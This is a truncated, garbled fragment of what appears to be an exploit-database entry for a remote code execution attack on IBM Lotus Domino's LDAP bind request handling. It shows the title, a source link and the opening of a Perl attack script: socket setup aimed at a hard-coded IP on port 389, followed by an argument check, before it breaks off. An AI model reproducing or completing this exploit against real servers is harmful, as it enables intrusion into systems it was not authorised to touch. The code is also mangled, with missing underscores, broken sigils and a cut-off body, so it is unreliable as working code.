IBM Lotus Domino LDAP - Bind Request Remote Code Execution
!/usr/bin/perl Source: http://www.protekresearchlab.com/index.php?option=comcontent&view=article&id=23&Itemid=23 use Getopt::Std; use IO::Socket::INET; $SIGINT = \ my $host = '192.168.100.66'; my $port = 389; my $proto = 'tcp'; my $sockType = SOCKSTREAM; my $timeout = 1; if defined $opth usage my...